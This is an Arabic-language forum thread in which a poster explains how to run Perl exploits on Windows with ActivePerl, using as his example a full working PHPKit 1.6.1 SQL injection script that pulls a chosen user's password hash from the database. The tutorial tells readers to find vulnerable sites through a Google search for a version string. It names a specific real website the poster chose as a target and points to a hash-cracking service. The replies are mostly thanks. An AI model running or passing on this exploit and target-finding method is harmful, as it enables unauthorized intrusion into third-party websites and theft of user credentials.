شرح طريقة استغلال ثغرات البيرل+ثغرة مثال

[gold-fire]

بسم الله الرحمن الرحيم
السلام عليكم ..
اليوم شباب حشرح لكم طريقة استغلال ثغرات البيرل وعلى فكرة يا شباب فى ناس الانانية فى طبعهم تدخل تستفيد و من غير ان تضع كلمة شكر على الموضوع او على الاقل تفيد بأى معلومة جديدة يا ريت اشوف ردودكم و استفسارتكم
ندخل فى الجد بقى
طبعآ درس اليوم بيتكلم عن طريقة استغلال الثغرات المكتوبة بالغة من احد اللغات المعروفة و القوية ايضآ و هى لغة البيرل .. قبل ان نبدآ يجب ان نتعلم شىء مهم و هو كيفية معرفة الثغرات المكتوبة بالغة البيرل ..؟
عندما ننظر الى اى كود و نجد فى بدايتة:

رمز:

#!/usr/bin/perl

اذآ علينا ان نعلم ان الثغرة التى سوف نتعامل معها هى احدى الثغرات المكتوبة بلغة البيرل ..
طريقة الاستغلال :
ــــــــــــــــــــــــــــــــــ
اولا:: اذا كنتم من مستخدمين بيئة الليونكس فهذا شىء ممتاز جدآ و لا حاجة لاى برنامج و اعتقد ايضآ انكم لستو فى حاجة لقرأة هذى الدرس .
اما اذا كنتم من مستخدمى بيئة الويندوز فعليكم بأستخدم برنامج ActivePerl
و ذالك لعمل كوبيلر لاكواد البيرل .
و هذة وصلة للبرنامج ::وصلة التحميل

الان بعد تحميل البرنامج و عمل Setup لة على الجهاز سوف يكون على هذا المسار .

رمز:

C:\Perl

الان كل شىء تمام نبدآ العمل
بعد ان نجد احد الثغرات مثال حناخد كمثال احد الثغرات

رمز:

#!/usr/bin/perl

use IO::Socket;

print q{
-----------------------------------------------
PHPKit 1.6.1 exploit by x23 ~ phcn.ws ~ geek-network.de
use: phpkit161.pl [server] [dir] [vic_id]
sample:
$ perl phpkit161.pl localhost /phpkit/ 1
-----------------------------------------------

};

$webpage =   $ARGV[0];
$directory = $ARGV[1];
$vic_id =    $ARGV[2];

if (!$vic_id) { die "~ read how to use ;)\n"; }

print "~ connecting\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";

print "~ exploiting\n";
print $sock "POST ".$directory."popup.php?path=misc/finduser.php HTTP/1.1\r\n";
print $sock "Host: $webpage\r\n";
print $sock "Keep-Alive: 300\r\n";
print $sock "(anti-spam-content-type:) application/x-www-form-urlencoded\r\n";
print $sock "Content-Length: ".length("search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1")."\r\n\r\n";

print $sock "search_user=%27+AND+1%3D0+UNION+SELECT+user_pw+FROM+phpkit_user+WHERE+user_id%3D".$vic_id."%2F*&action=Suche&User=-1";

while ($answer = <$sock>) {
  #print $answer;
  if ($answer =~/<option value="([0-9a-f]{32})">/) {
     print "~ hash: $1\n";
     close($sock);
     exit();
     break;
  }
}

close($sock);

# milw0rm.com [2006-11-04]

اول شىء نعملة بعد معرفتنا ان هذا الكود لاحد ثغرات البيرل هو اننا نأخد الكود كلة Copy ونضعة Past فى الـ Notbad و نغلقها حيطلب منك عمل Save نضغط على كلمة Yes الان لدينا الكود على هيئة txt علينا ان نغير الامتداد من txt الى pl نفترض اننا سوف نقوم بتسمية الملف exploit.txt علينا ان نغير txt ليصبح بهذا الشكل exploit.pl الان و بعد التأكد من اتمام هذة العملية بنجاح علينا ان ضع الملف exploit.pl داخل الملف bin على هذا المسار




و بعد و ضع الملف داخل هذا المجلد نذهب الى الـ Run الموجودة ضمن قائمة Start و نكتب cmd سيظهر لنا شاشة الدوس بهذا الشكل :




و بعد ان يتم عمل الترجمة لملف البيرل و يفتح امامنا سوف نشاهد طريقة الاستخدام الخاص لهذة الثغرة و كل ثغرة لها طريقة الاستخدام الخاصة بها و فى مثالنا هذا



للبحت عن المواقع المصاب فية www.google.com

رمز:

erstellt mit PHPKIT Version 1.6.1

اما انا فخترت هدا الموقع www.silent-angels-webcenter.de/phpkit



لم يبقى سوى كسر تشفير كلمة الرور ببرامج كسر تشفير او موقع www.milw0rm.com/cracker

اخوكم gold-fire

[azagorath666]

very nice ,have u ever used metasploit project .if u dont know what is it i can explain. it to u and tell u where to get it .u must use linux for it

thanks
hacker from USA

[gold-fire]

وين الردود

[sika_love]

مشكورررررررررررررررر

[احمد شيكو ملك الشات]

مشكوووووووووووووررررررررررررر

[محمد رحال]

مشكوررررررررررررررررررررر

[creative2010]

شكرا على الشرح
يس عندي الصورتبع الشرح ماظهرت
يا ترى ليش؟
و جزاك الله خيرا